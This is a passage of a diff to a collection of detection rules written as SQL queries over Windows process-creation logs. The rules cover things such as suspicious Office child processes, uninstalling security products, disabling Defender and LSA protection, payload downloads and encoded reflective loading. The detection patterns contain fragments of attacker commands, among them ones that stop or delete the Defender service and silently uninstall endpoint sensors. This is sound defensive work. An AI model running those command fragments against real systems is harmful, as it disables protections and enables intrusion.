'%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName 
LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": 
"Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." 
+ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + 
"attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE 
'%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential 
process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE 
'%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", - "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "status": "test", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might leverage the same command line for debugging or other purposes. 
